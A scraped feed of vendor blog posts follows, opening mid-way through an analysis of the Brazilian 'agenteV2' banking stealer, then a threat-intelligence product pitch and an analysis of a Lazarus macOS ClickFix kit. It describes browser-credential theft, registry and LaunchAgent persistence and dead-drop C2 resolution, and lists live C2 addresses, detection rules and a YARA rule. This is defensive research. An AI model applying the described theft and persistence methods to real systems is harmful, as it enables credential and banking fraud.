This fileless execution pattern means the next stage never touches the filesystem in decoded form, evading file-based AV scanning. The decoded payload can be recovered by inserting a logging hook at the Execute call or by running the decoding pipeline offline with the extracted keys. 

Overall assessment: the obfuscation chain is consistent with the use of publicly available VBS templates or tutorials. The layered approach demonstrates awareness of basic detection mechanisms but no understanding of cryptographic security. The presence of hardcoded keys and deterministic transformations makes full offline payload recovery straightforward for any analyst with access to the script. 

4. Stage 2 Payload Architecture 

The payload follows a two-component architecture: a lightweight container executable (wifi_driver.exe) and the actual malicious module (agenteV2_historico_detect.dll). These roles must not be confused only the DLL contains malicious logic. 

wifi_driver.exe Container/Bootloader 

wifi_driver.exe is a self-contained onefile bundle (PyInstaller or Nuitka container mode). It contains no malicious logic of its own. Its sole purpose is to: 

• Extract the full Python 3.13 runtime environment to a temporary directory (Temp\onefile_<PID>_<timestamp>\); 

• Extract all required .pyd extensions and native DLLs alongside the runtime; 

• Load and execute agenteV2_historico_detect.dll the actual payload; 

• Clean up the extraction directory on exit.  

wifi_driver.exe is a self-contained onefile bundle (PyInstaller or Nuitka container mode). It contains no malicious logic of its own. Its sole purpose is to:

• Extract the full Python 3.13 runtime environment to a temporary directory (Temp\onefile_<PID>_<timestamp>\);
• Extract all required .pyd extensions and native DLLs alongside the runtime;
• Load and execute agenteV2_historico_detect.dll the actual payload;
• Clean up the extraction directory on exit.

Reverse engineering path for wifi_driver.exe: 

• If PyInstaller: use pyinstxtractor.py to unpack the bundle → locate main.pyc (or file named after the executable) → decompile with pycdc to recover readable Python source; 

• If Nuitka container mode: the bootstrap code is minimal C focus effort on the extracted DLL, not the container; 

• The container itself is not the analytical target it is merely the delivery mechanism for the DLL. 

Extracted runtime components dropped to Temp\onefile_<PID>\ by wifi_driver.exe: 

agenteV2_historico_detect.dll Core Stealer (Nuitka) 

This DLL is the analytical target it contains all malicious logic. The original Python source was compiled with Nuitka (Python → C++ → native machine code), producing a monolithic 27 MB PE DLL with no extractable bytecode. pyinstxtractor and uncompyle6 do not apply here.

Despite robust Nuitka compilation, the threat actor failed to strip debug symbols, variable names, and cleartext strings from the binary exposing the full execution flow via static .rdata analysis. This is a recurring pattern in Brazilian malware: technically capable packaging decisions paired with poor operational security discipline. 
 
Core Capabilities (Reconstructed from Static + Dynamic Analysis):  

The malware does not hardcode the C2 address. It queries a Pastebin URL to dynamically retrieve the active C2 IP and port, enabling infrastructure rotation without redeployment: 

Dead-Drop URL:  https://pastebin.com/raw/0RmxqY57 
Resolved C2:    38.242.246.176:8443 

4.1. Persistent WebSocket Backdoor Interactive Agent 

Unlike typical stealers that perform a single HTTP POST exfiltration and terminate, agenteV2 establishes a persistent WebSocket connection (uws:// scheme) to the C2. This architecture enables real-time, bidirectional communication making it function as a full interactive backdoor rather than a passive stealer: 

• Continuous screen capture stream using PIL (Pillow) and mss libraries frames encoded as JPEG and streamed live to the operator; 

• Interactive remote shell via CMD:SHELL: command prefix commands dispatched through subprocess.Popen, output returned over the WebSocket; 

• Real-time telemetry: live operator visibility into the victim’s desktop session. 

This design is optimized for manual, real-time financial fraud. The operator can watch the victim’s screen, interact with open banking sessions, and issue commands on the fly. 

4.2. Evasive Browser Credential Harvesting 

The stealer targets all Chromium-based browsers (Chrome, Edge, Brave, Opera) across all user profiles. To bypass the SQLite file lock maintained by running browsers, it uses shutil.copyfile to duplicate the target database files into %TEMP% before executing SQL SELECT queries:  

Target files: Login Data, Cookies, History  

Method: shutil.copyfile(src, %TEMP%<random>) → sqlite3.connect(copy) → SELECT * FROM logins 

4.3. Security Controls & Anti-Fraud Enumeration 

The malware proactively profiles the host for regional anti-fraud and endpoint protection solutions before proceeding with credential theft a strong indicator of deliberate LATAM targeting: 

• Diebold Warsaw (Warsaw Security Module) disk path queries for this widely-deployed Brazilian banking security plugin; 

• GbPlugin disk path queries for this browser security plugin used by major Brazilian banks. 

Detection of these solutions likely influences the malware’s behavior (evasion, delayed execution, or alternate attack paths). 

4.4. Analyst Assessment 

agenteV2 is not a passive, fire-and-forget stealer. It is a purpose-built interactive agent designed for real-time manual financial fraud in the Brazilian market. The WebSocket architecture, live screen streaming, and remote shell capability are consistent with an operator-assisted attack flow: the threat actor watches the victim’s screen in real time, waits for a banking session to open, and interacts directly.  

The Nuitka compilation demonstrates meaningful anti-analysis effort; however, the failure to strip debug strings, variable names, and cleartext URLs reveals the full implementation to any analyst with access to the binary a significant OpSec failure that partially undermines the obfuscation investment. 

4.5. Persistence Mechanisms 

The payload establishes a third persistence layer independently of the VBS loader: 

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 

Value: MonitorSystem 

Data: C:\Users\admin\AppData\Local\Temp\ONEFIL~1\agenteV2_historico_detect.py 

Note: the Registry Run value points to a .py file in %TEMP% this assumes either Python is installed and registered as a handler for .py files on the victim machine, or represents an implementation error by the threat actor (a common characteristic of amateur-but-functional malware). The name ‘MonitorSystem’ is social engineering for any victim who opens regedit. 

5. Stage 3 C2 Communication 

5.1. Dead-Drop Resolver via Pastebin 

agenteV2 does not hardcode the C2 IP. Instead, it implements a Pastebin-based dead-drop resolver allowing the threat actor to rotate C2 infrastructure without recompiling or redelivering the malware: 

The resolver (documented in DLL strings as ‘Busca IP e Porta Base do Pastebin. Retorna (ip, port) ou None’) parses the Pastebin content to extract the IP and port as a tuple, with explicit error handling for fetch failures and malformed content. 

5.2. Beacon Pattern 

5.3. TLS Fingerprints 

The JA3 hash (a48c0d5f95b1ef98f560f324fd275da1) can be used as a network detection rule it will match agenteV2’s TLS ClientHello regardless of C2 IP rotation. 

6. Threat Actor Infrastructure 

6.1. Infrastructure Map 

6.2. C2 Server Detail (Shodan) 

The Hestia Control Panel on port 8083 indicates the threat actor self-manages this server rather than using a hosting reseller. The presence of active SMTP ports alongside the C2 port strongly suggests this VPS serves as an all-in-one campaign platform: phishing email dispatch, payload hosting management, and C2 handling. 

Threat Actor Assessment 

Campaign Characteristics 

• Exclusively targeting Brazilian users Portuguese lure, CNJ court number format, Brazilian bank/fintech targeting, and enumeration of LATAM-specific anti-fraud tools (Diebold Warsaw, GbPlugin); 

• Judicial summons lure is a well-established social engineering technique in Brazil exploits fear of legal consequences to reduce victim scrutiny; 

• Per-victim unique tracking ID (?id=3df947b3) demonstrates the actor actively monitors individual infection progress; 

• WebSocket persistent backdoor with live screen streaming points to operator-assisted, manual fraud the threat actor watches victims’ screens in real time and waits for banking sessions to open; 

• Cloudflare Turnstile CAPTCHA on payload server deliberate anti-sandbox and anti-researcher measure; 

• Multi-step redirect chain before payload delivery adds anti-scraping friction; 

• ‘agenteV2’ naming implies active development a prior version (v1) likely exists or circulated previously; 

• Nuitka compilation of the core DLL represents a meaningful step above typical Brazilian stealer tradecraft; however, the failure to strip debug strings, variable names, and cleartext URLs is a significant OpSec failure that partially negates the obfuscation investment. 

Infrastructure Assessment 

• Two-tier delivery infrastructure (69[.]49.241[.]120 for phishing/payload, 38[.]242.246[.]176 for C2) separation reduces single-point takedown impact; 

• Pastebin dead-drop resolver is the primary C2 resilience mechanism actor can rotate C2 IPs by editing a single Pastebin page without touching deployed malware; 

• Active SMTP ports on C2 VPS strongly suggest self-hosted phishing email dispatch from the same server; 

• Hestia Control Panel indicates actor self-manages the VPS not a reseller customer; 

• Contabo GmbH (AS51167) is a known bulletproof-tolerant provider frequently abused by threat actors for affordable pricing and slow abuse response; 

• Implementation inconsistency (Registry Run value pointing to .py file) suggests the actor has strong Python development skills but limited operational security maturity.  

Detection & Response Recommendations 

1. Immediate Blocking 

• Block domains odaracani[.]online and nuevaprodeciencia[.]club at DNS/proxy/firewall; 

• Block IPs 69[.]49.241[.]120 and 38[.]242.246[.]176 at perimeter; 

• Add JA3 hash a48c0d5f95b1ef98f560f324fd275da1 as a network detection rule (IDS/NDR/EDR); 

• Block or alert on access to pastebin[.]com/raw/0RmxqY57 and request takedown of the page; 

• Deploy Suricata SIDs listed in section 6.6. 

2. SIEM Detection Rules 

• Alert: WScript.exe spawning cmd.exe with ‘schtasks’ + ‘/rl highest’ in command line; 

• Alert: Any process writing PE files to C:\Program Files (x86)\Wi-fi\; 

• Alert: Scheduled Task creation with /rl highest by non-SYSTEM processes (Event ID 4698); 

• Alert: HKCU\Run key creation by non-installer processes; 

• Alert: ADODB.Stream + MSXML2.ServerXMLHTTP instantiated in the same WScript.exe process; 

• Alert: Outbound TLS connections to port 8443 from non-browser processes. 

3. YARA detection rule 

Use YARA rule search in TI Lookup:  

The rule: 

rule Win_Stealer_AgenteV2_Nuitka { 

meta: 

description = "Core Banker Stealer Nuitka Compiled" 

author = "0xOlympus" 

reference = "Analise de Campanha Judicial" 

date = "2026-03-19" 

severity = "Critical" 


strings: 

// Nuitka Artifcats 

$n1 = "NUITKA_PACKAGE_HOME" ascii 

$n2 = "__nuitka_binary_dir" ascii 

// Strings from report 

$s1 = "agenteV2_historico_detect.dll" ascii wide 

$s2 = "wifi_driver.exe" ascii wide 

$s3 = "reiniciar.exe" ascii wide 

// C2 protocol 

$c2 = "uws://" ascii 

condition: 

uint16(0) == 0x5A4D and (all of ($n*) and 2 of ($s*)) or ($c2) 

}

4. Incident Response Checklist 

Verify the presence of active compromise indicators:

schtasks /query /tn "RunAsAdmin_AutoUpdate" 

schtasks /query /tn "RunAsAdmin_Executar" 

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v MonitorSystem dir "C:\Program Files (x86)\Wi-fi\" 

• Isolate affected host from network immediately upon detection; 

• Collect full memory dump of wifi_driver.exe and reiniciar.exe processes before terminating; 

• Hash all files in C:\Program Files (x86)\Wi-fi\ and compare against IOCs in section 6.1; 

• Assume all browser-saved credentials are compromised reset all banking, email, and crypto account passwords; 

• Review outbound TLS/8443 traffic in network logs for the past 30 days to assess exfiltration window; 

• Check browser extension integrity stealer may have modified or added extensions. 

5. Threat Intelligence: TI Feeds & TI Lookup 

Proactive intelligence on this campaign and similar threats can be operationalized using ANY.RUN’s Threat Intelligence suite: 

• ANY.RUN TI Lookup: Query all IOCs from this report (domains, IPs, file hashes, JA3 fingerprints) directly in TI Lookup to retrieve correlated sandbox verdicts, associated samples, C2 infrastructure mappings, and MITRE ATT&CK tagging across the ANY.RUN corpus. TI Lookup returns structured, analyst-ready context including first-seen/last-seen timestamps, related tasks, and artifact relationships — dramatically accelerating triage. 

• ANY.RUN TI Feeds: Subscribe to structured IOC feeds to push indicators from this campaign — and the broader Brazilian banking stealer ecosystem — directly into your SIEM, SOAR, EDR, or firewall. Feeds are updated continuously as new samples are analyzed in the sandbox, providing near-real-time coverage of emerging infrastructure and payload variants. 

• YARA Rules in TI Feeds: The Win_Stealer_AgenteV2_Nuitka YARA rule (section 9.3) can be deployed via ANY.RUN’s TI infrastructure to automatically flag new samples matching the Nuitka agenteV2 pattern as they surface in the wild. 

• Proactive Monitoring: Use TI Lookup to monitor the Pastebin dead-drop URL (pastebin.com/raw/0RmxqY57) and C2 IP (38.242.246.176) for updates — if the threat actor rotates infrastructure, ANY.RUN’s correlated sandbox data will surface the new indicators before they reach victim endpoints. 

The Business Case for ANY.RUN Enterprise 

Security decision-makers evaluating their defensive posture against threats like agenteV2 face three compounding problems: the attack surface is broad (any employee in Brazil is a potential victim), the time-to-fraud is measured in minutes (not days), and the attacker’s tooling actively resists the tools most organizations currently deploy.

The question is not whether a more capable threat intelligence and analysis platform is needed. It is whether the cost of that platform is lower than the cost of a single successful fraud event. 

Based on the capabilities demonstrated in this campaign, the answer is unambiguous. A single successful agenteV2 infection gives an attacker live visibility into an employee’s banking session, the ability to issue commands through a remote shell, and persistence that survives the endpoint until it is explicitly cleaned. The financial exposure from a single operator-assisted fraud event, combined with the credential exfiltration across all browser profiles, will in most cases far exceed the annual cost of enterprise-grade behavioral analysis and threat intelligence. 

ANY.RUN Enterprise Suit addresses each failure mode this campaign is designed to exploit: 

• Before infection: Interactive Sandbox detonates suspicious email attachments, including password-protected PDFs, with analyst interaction in a fully instrumented Windows environment. The complete 11-stage attack chain surfaces in minutes, before any production endpoint is touched. 

• During triage: TI Lookup delivers instant, correlated intelligence on every IOC in this report (domains, IPs, file hashes, JA3 fingerprints) with MITRE ATT&CK mapping, first/last seen timestamps, and linked sandbox analyses. Triage that takes an analyst hours without context takes seconds with TI Lookup. 

• At scale and speed: TI Feeds push structured, continuously updated IOC streams directly into your SIEM, SOAR, EDR, and firewall, converting sandbox findings into blocking and detection rules automatically, across your entire environment, without analyst intervention per indicator. 

• Against evasion: Behavioral analysis in ANY.RUN’s sandbox is not defeated by Nuitka compilation, in-memory execution, or filename masquerading. It observes what the malware does, not what it looks like, making it structurally resistant to the obfuscation techniques this campaign relies on. 

• Against infrastructure rotation: The JA3 TLS fingerprint and behavioral YARA rule in this report remain valid even after the threat actor rotates their C2 IP. ANY.RUN’s TI infrastructure ensures these durable detection signals are operationalized immediately, not after the next campaign wave. 

The agenteV2 operators have invested meaningfully in their tooling. The organizations they target deserve to match that investment — with a platform built for the reality of modern, operator-assisted financial fraud rather than the commodity threats of five years ago. 

Conclusion 

This campaign is a vivid reminder that phishing has outgrown its old role as a simple delivery mechanism. It now acts as a gateway to interactive, real-time financial compromise, where attackers don’t just steal data, they participate in the victim’s actions like an invisible co-pilot with bad intentions. 

For businesses, the risk is no longer limited to credential leakage. When malware enables live screen monitoring, remote command execution, and direct interaction with financial sessions, the impact shifts to immediate financial loss, operational disruption, and reputational damage. Finance teams, executives, and any employees handling sensitive transactions become prime targets. 

Defending against this class of threats requires more than static detection. Organizations need visibility into behavior, speed in investigation, and context for decision-making. 

This is where a combined approach becomes critical: 

• Interactive Sandbox analysis helps teams understand exactly how a threat behaves before it spreads. 

• Threat Intelligence Feeds allow proactive blocking of known malicious infrastructure. 

• TI Lookup provides instant context, turning isolated indicators into actionable insight. 

Together, these capabilities transform security from reactive firefighting into controlled, informed response. 

In a landscape where attackers operate in real time, businesses must do the same.

About ANY.RUN   

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

Indicators of Compromise

1. File Hashes

Network IOCs

Malicious URLs

Host-Based IOCs

TLS / Network Fingerprints

IDS/IPS Signatures (Observed Suricata Alerts)

MITRE ATT&CK Mapping

FAQ

The post Inside agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time  appeared first on ANY.RUN's Cybersecurity Blog.

Here’s how your team can test TI’s impact on triage quality, response speed, and threat hunting workflows. 

See How Threat Intelligence Accelerates Your SOC 

ANY.RUN now offers 20 premium requests in Threat Intelligence Lookup and YARA Search as part of the Free plan.  

You can get immediate threat context for over 40 types of IOCs, IOBs, and IOAs belonging to the latest malware & phishing attacks. All data is sourced from real sandbox investigations by ANY.RUN’s community of 15,000 organizations and 600,000 security analysts and experts. 

AI-assisted search is available directly in the query flow, allowing analysts to use natural language and move from question to results without manual query building. 

With this expanded access, SOC and MSSP teams can explore Threat Intelligence capabilities in their workflows and see how it affects core SOC processes for faster and more confident operations: 

• Reduce triage time: Validate alerts against ANY.RUN’s threat database to get immediate verdicts, full context, and access to related samples and activity. 

• Improve response accuracy: Pivot from a single indicator to connected infrastructure, artifacts, and behavior to understand how the attack unfolds and what else needs containment. 

• Run more effective threat hunts: Test hypotheses against live attack data, find related samples with YARA Search, and confirm relevance before expanding the hunt. 

• Build detections based on real attacks: Use discovered patterns and artifacts to create or refine detections aligned with current malware and phishing activity. 

This directly impacts key SOC metrics, including reduced time per investigation, lower escalation rates, and faster Mean Time to Respond. 

AI Search for Streamlined Investigations 

To speed up investigations and simplify how analysts work with Threat Intelligence, TI Lookup now includes AI-assisted search directly in the search bar.  

Analysts can use natural language to query data, while the system automatically translates requests into structured queries with the correct parameters and wildcards. 

This removes time spent on query construction and reduces friction in the workflow. Analysts move faster from alert to context, run more queries in less time, and get consistent results without additional steps. 

Fueling Core SOC Workflows 

Threat intelligence becomes truly valuable when it integrates into everyday operations. Here’s how it reinforces the three pillars of any SOC. 

1. Triage: From Guesswork to Confident Decisions 

Alert volume is the defining operational challenge for most SOC teams. The ability to validate an alert quickly and to make a confident decision about whether to close it or escalate directly determines how efficiently a team can operate. 

With ANY.RUN’s threat intelligence, analysts can immediately check an incoming indicator against a broad base of real-world attack data. Known-malicious infrastructure, recognized malware patterns, and previously documented campaigns can be matched in seconds. This means: 

• Faster, evidence-backed decisions on alert validity; 

• A measurable reduction in the percentage of escalations driven by uncertainty rather than confirmed risk; 

• Lower analyst cognitive load during high-volume periods. 

destinationIP:”198.37.119.56″ 

Analysts spend less time on inconclusive alerts and more time on confirmed threats. With documented context to support every decision. 

2. Response: Seeing the Bigger Picture 

Once an incident is confirmed, speed and precision matter. The quality of the response depends on how well the team understands the threat: its connections, its infrastructure, its behavioral patterns, and its likely next moves. Two clicks in TI Lookup search results cited above take your analyst to a sandbox session of malware detonation and attack chain exposure:  

ANY.RUN’s threat intelligence enables response teams to map the relationships between indicators and the broader campaigns or actor groups behind them. Shared infrastructure, overlapping TTPs, and connected artifacts can be identified quickly, giving responders a structural understanding of what they are dealing with, not just a list of individual indicators. 

This translates into: 

• More complete scoping of incidents, with fewer blind spots; 

• Targeted containment and remediation actions grounded in evidence; 

• Higher confidence in response decisions. 

Overreaction and underreaction are reduced at the same time. The response becomes targeted, not reactive. 

3. Threat Hunting: Testing Hypotheses Against Reality 

Proactive threat hunting requires the ability to test hypotheses against real-world data. Analysts need to move from a suspicion about adversary behavior to a confirmed or refuted finding with enough evidence to act. 

ANY.RUN’s threat intelligence gives hunters access to a rich, searchable base of behavioral data from real-world malware analysis. Campaign linkages, attacker infrastructure patterns, and behavioral signatures can all be researched in depth.  

YARA Rules Search adds a further dimension, allowing hunters to build and validate detection logic against current threat data. 

The result is a hunting capability that is grounded in current, real-world evidence rather than theoretical models. It enables teams to find genuine threats and build detection coverage that reflects how adversaries actually behave. Hunting shifts from speculative to evidence-driven. 

How Threat Intelligence Impacts Your Business Outcomes  

Behind every alert, investigation, and response action, there is a business impact quietly accumulating. 

For Security Operations Teams (SOCs & MSSPs):

• Alert validation accelerates, reducing the time from detection to decision. 

• Fewer escalations are driven by uncertainty; each escalation carries stronger evidentiary weight. 

• Investigation time decreases as analysts access contextualized data without pivoting between tools. 

• Analyst confidence improves, reducing the hesitation that slows response in high-pressure situations 

For the Organization:

• Incident costs fall when threats are understood accurately and responded to precisely. 

• Faster response timelines limit attacker dwell time and reduce the scope of potential damage. 

• The risk of missing significant threats decreases as detection and investigation are backed by broad, current intelligence. 

• Security investments deliver more measurable returns when team capacity is focused on real, confirmed risk. 

Scale SOC Performance with Full Access to Threat Intelligence from ANY.RUN 

The Free plan is a genuine starting point: a full-capability evaluation that lets teams verify the value of ANY.RUN’s intelligence on real workflows. For organizations ready to operationalize threat intelligence at scale, ANY.RUN offers paid plans designed for different operational needs. 

These include Live, Core, and Complete plans, allowing teams to choose the level of access and integration that fits their workflows and scale.  

Across these plans, organizations can leverage the full set of threat intelligence capabilities, including:  

1. Threat Intelligence Feeds 

Continuous streams of validated indicators enriched with behavioral context from the sandbox analyses, delivered directly into SIEM, EDR, IDS/IPS, and SOAR systems. This enables automated enrichment and faster detection pipelines. 

2. Threat Intelligence Reports: full access 

Structured analyses of active campaigns, malware families, and attacker techniques. These reports provide ready-to-use insights for both operational response and strategic planning.  

What makes them particularly useful in operations: 

• Clear breakdowns of campaigns, including tactics, techniques, and procedures; 

• Context around how attacks unfold in real environments; 

• Indicators and infrastructure tied together into meaningful clusters; 

• Ready-to-use insights that support both immediate response and long-term defense. 

Reports act as a bridge between raw telemetry and strategic understanding. They help teams not only react faster, but also recognize patterns before they escalate into incidents. 

3. Threat Landscape 

A contextual layer that maps threats to industries and geographies, helping organizations understand where specific risks are most relevant to their business. 

threatName:”vidar” 

Together, these capabilities support key business objectives: 

• Reducing mean time to detect and respond (MTTD/MTTR); 

• Lowering operational costs of incident handling; 

• Improving analyst efficiency and capacity utilization; 

• Strengthening risk management and compliance posture. 

The result is a measurable improvement in how security operations contribute to overall business resilience. 

Final Thoughts

The gap between threat detection and effective response is not primarily a technology problem. It is a data problem. When analysts have access to rich, current, contextual intelligence at the moment they need it, decisions improve and outcomes follow. 

ANY.RUN’s unified threat intelligence — TI Lookup, TI Feeds, TI Reports, and YARA Search, all powered by real sandbox data from 15,000 organizations — gives SOC and MSSP teams that foundation. The free plan removes the evaluation barrier: any team can run it through real workflows, on real alerts, before committing to anything. 

For teams that operationalize it, the cumulative effect is a SOC that is measurably faster, more accurate, and more confident — and an organization that is measurably harder to compromise and cheaper to defend. 

About ANY.RUN   

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

The post More Attack Context for Faster Triage, Response, and Hunting. Now Available to Every SOC appeared first on ANY.RUN's Cybersecurity Blog.

The recent wave of ClickFix attacks has introduced several new ways to compromise users, establishing itself as a technique that is likely here to stay. We have observed Lazarus Group using this method to distribute a range of malware, from well-known families to more unusual variants such as PyLangGhostRAT, a Python-based vibe-ported of the original Go version, along with other oddities. 

In this article, we analyze the next stage of this campaign: a newly identified macOS malware kit that is currently being actively distributed. 

Executive Summary

• What’s happening: Lazarus Group is running an active campaign using fake meetings to gain access to corporate systems, credentials, and sensitive data. 
• Who is at risk: Fintech, crypto, and high-value environments where macOS is widely used by developers, executives, and decision-makers. 
• How access is gained: Users execute commands themselves, allowing attackers to bypass traditional controls and operate without immediate detection. 
• What attackers are after: Credentials, browser sessions, and macOS Keychain data that provide direct access to infrastructure and financial assets. 
• Why this is hard to detect: The attack relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools. 
• How data is exfiltrated: Telegram is used as a trusted channel to move sensitive data outside the organization. 
• What this leads to: Account takeover, unauthorized infrastructure access, financial loss, and exposure of critical data. 
• What this means for CISOs: A single compromised macOS device can result in full access to internal systems, production environments, or crypto assets. 
• How SOCs should respond: Identify credential exposure early by introducing ANY.RUN’s cross-platform analysis capabilities during triage that offers a 36% higher detection rate.

New Lazarus ClickFix macOS Campaign: Why Companies Are at Risk 

Lazarus Group is actively running a campaign that turns routine business communication into a direct path to credential theft and data loss. 

The attack targets business leaders through Telegram, often using compromised accounts of colleagues or contacts. Victims receive what appears to be a legitimate meeting invitation and are redirected to a fake collaboration platform that mimics Zoom, Microsoft Teams, or Google Meet. The scenario is familiar and urgent, which lowers suspicion and increases the likelihood of interaction. 

Instead of exploiting a technical vulnerability, the attackers rely on a simple instruction. The user is prompted to “fix” a connection issue by copying and executing a command. This step shifts control to the attacker without triggering many traditional security controls, because the action is performed by the user themselves. 

From that moment, the operation is focused on extracting business value as quickly as possible. The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data. These assets provide immediate access to corporate systems, SaaS platforms, and financial resources. 

Telegram is used again as an exfiltration channel, allowing stolen data to be transferred through a legitimate service that blends into normal traffic.  

By the time the activity is recognized as malicious, credentials may already be compromised and sensitive data already exfiltrated. At that point, the organization is dealing with: 

• Unauthorized access to business systems and accounts  

• Financial loss through fraudulent transactions or misuse of access  

• Exposure of sensitive data leading to regulatory and reputational impact 

At the core of this operation is a newly identified macOS malware kit, “Mach-O Man”, discovered by the Quetzal Team. Built as a set of Go-based Mach-O binaries, it reflects a shift toward native macOS threats. The following sections break down how this kit operates across each stage of the attack chain. 

Technical Analysis of the Mach-O Man Kit 

The Stager 

As described earlier, in this ClickFix campaign, the victim is invited to a meeting via Telegram, typically by a compromised contact sharing a link.  

When the user visits it, they are taken to a site impersonating a legitimate meeting platform such as Zoom, Meet, or Teams. The page then displays a fake error message claiming that, to resolve the issue, the user must copy and paste a command into their terminal. 

Thanks to ANY.RUN’s Interactive Sandbox, we can safely execute this command and observe the malicious behavior inside a secure macOS VM, without risk to our systems.  

See live sandbox analysis of fake Mach-O Man kit apps 

Trusted by 15,000 organizations worldwide, including 74 Fortune 100 companies, ANY.RUN accelerates triage & response by enabling SOC teams to analyze URLs and files within a private, real-time virtual environment, reproducing the full attack flow across Windows, macOS, Linux, and Android.  

The result is faster, more consistent decisions across the SOC, with earlier identification of threats, reduced response time, and lower risk of incidents escalating into financial and operational impact. 

Pasting and running the command in the terminal leads to the installation of malware. In this case, it executes teamsSDK.bin, the stager and initial component of the Mach-O Man kit. 

When executed in our laboratory, we observed an interesting behavior: when run without arguments, the binary displays a usage message indicating how to activate it and revealing support for impersonating Google, Zoom, Teams, and “System”. 

Fun fact: if you try to choose Google, it politely states that it is “not yet implemented”. A surprisingly polished touch. 

When invoked correctly, it downloads a fake macOS Application impersonating one of the previously mentioned platforms, with “System” referring to generic macOS system prompts presented to the user. To ensure execution, the malware uses macOS’ codesign utility to apply an ad-hoc signature to the application bundle, making it appear properly signed to the system. 

All applications are virtually identical, differing only in minimal visual cues. They prompt the user for their password in broken English three times in a row. 

The first two attempts always shake the window, indicating that the password is incorrect (even if not), while the third one disappears as if the authentication had succeeded. 

Independently, at the end they all display Zoom’s logo along with a message stating that the installation was successful. 

Running them interactively from the shell reveals errors during execution. Many interesting failures will be discussed throughout the analysis of the remaining components, suggesting that exhaustive testing was not conducted. 

In the background, the next stage is downloaded, typically named in the format D1{??????}.bin. Some examples we were able to retrieve include D1YrHRTg.bin, D1yCPUyk.bin, and D1ozPVNG.bin. At the same time, the malware performs basic fingerprinting via sysctl queries, collecting information such as CPU details and system boot time. 

Let’s check the next stage. 

The Profiler 

This second binary, D1YrHRTg.bin (or any other variant you are able to retrieve), acts as a system profiler. It registers the host with the C2 and sends a system profile. 

The first notable behavior is that, when executed without arguments, it once again displays a usage message, a rather kind gesture. 

This module relies on sysctl and local userland tools to build a comprehensive profile of the host, including hostname, a unique identifier, CPU type, boot time, operating system details, network configuration, running processes, and a list of browser extensions, with dedicated targeting of Brave, Vivaldi, Opera, Chrome, Firefox, and Safari. 

This information is written to a text file and sent to the C2 server. 

As previously noted, some of these modules are faulty.  

This one, in particular, exhibits a self-sabotaging behavior, occasionally entering an endless loop that repeatedly posts the system profile text file to the C2 server, exhausting system resources and making its presence quite obvious to the victim. 

Next, a new binary called minst2.bin is retrieved from the /payload C2 endpoint, marking the beginning of the persistence stage. 

The Persistence Mechanism 

minst2.bin was slightly trickier to debug, as it does not come bundled with a usage helper, so I had to manually fine-tune both the number and type of arguments required. After reverse engineering how the previous stage invokes it, I found that it takes the machine UUID, a payload URL, and a filename as arguments, and proceeds to download a remote file named localencode, saving it locally as OneDrive and setting it up to run at as a startup item. 

To achieve this, it creates a folder called “Antivirus Service”, where it stores this binary, and sets up a LaunchAgent, the macOS equivalent of a Windows Service, to execute it at startup. From that point on, it re-invokes the malware kit at every login. 

Moving on to the final stage, this script cleans up by deleting all ZIP files and downloaded fake applications (*.app) from the temporary directory. The parent process then proceeds to download the final binary in the kit: macrasv2. 

The Stealer 

Obtained from the same /payload endpoint, macrasv2 is the final stealer and the main component of the chain.  

See sandbox analysis of macrasv2 

It stages all previously collected data, including, but not limited to, browser extension data, stored browser credentials and cookies (typically kept in SQLite databases), macOS Keychain entries, and other files of interest, consolidating them into a temporary directory. Since this is an empty laboratory, the number of staged files is relatively small. 

From there, the data is archived into a file named user_ext.zip, preparing it for exfiltration. 

Exfiltration is carried out through a familiar channel, Telegram. In this case, however, the operators exposed their bot token, effectively allowing third parties to interact with the bot. This not only weakens their operational security but also simplifies reporting and potential takedown efforts. 

This makes it trivial to both read the bot’s messages, send messages on its behalf, and even identify its owner. 

Finally, the malware invokes a self-deletion script named delete_self.sh, which simply removes itself and other components using the system’s rm command. 

With this, the full infection cycle is complete. Thanks to ANY.RUN’s macOS analysis capabilities, we were able to fully reconstruct it in record time. It is worth noting that this is a novel (previously unseen) malware, which would typically require significantly more time to disassemble and analyze using traditional methods. 

Let’s now move on to the ATT&CK Matrix, followed by the IOCs and other interesting details. 

Additional Observations 

• The malware is badly written, with certain components entering infinite loops that may expose its presence due to system resource starvation.  

• Operational security weaknesses were identified, such as exposed Telegram bot tokens and C2 endpoints with missing authentication.  

• The use of ad-hoc code signing indicates an attempt to bypass macOS execution controls without valid developer credentials.  

• Network traffic analysis shows that the malware primarily communicates over ports 8888 and 9999. Additionally, HTTP requests consistently use a User-Agent string associated with the Go programming language (e.g., Go-http-client), which aligns with other observed components of the toolset.  

• The adversary’s infrastructure exposed multiple services, including WinRM, Chrome Remote Desktop, Remote Desktop Protocol (RDP), and a replica of the C2 server running on port 110.  

• Reverse engineering analysis indicates that multiple components of the malware are written in Go. This is supported by the presence of Go-specific strings and referenced artifacts within the binaries, including characteristic function naming conventions, runtime structures, and the use of the standard Go HTTP client in network communications.  

Defending Against Lazarus Attacks: How CISOs Can Minimize Risk 

Trust-abuse phishing, exemplified by campaigns like Mach-O Man, exploits legitimate platforms to bypass conventional security measures. Attackers manipulate human psychology with urgent meeting requests or fake technical issues, tricking users into executing malicious commands or disclosing credentials.  

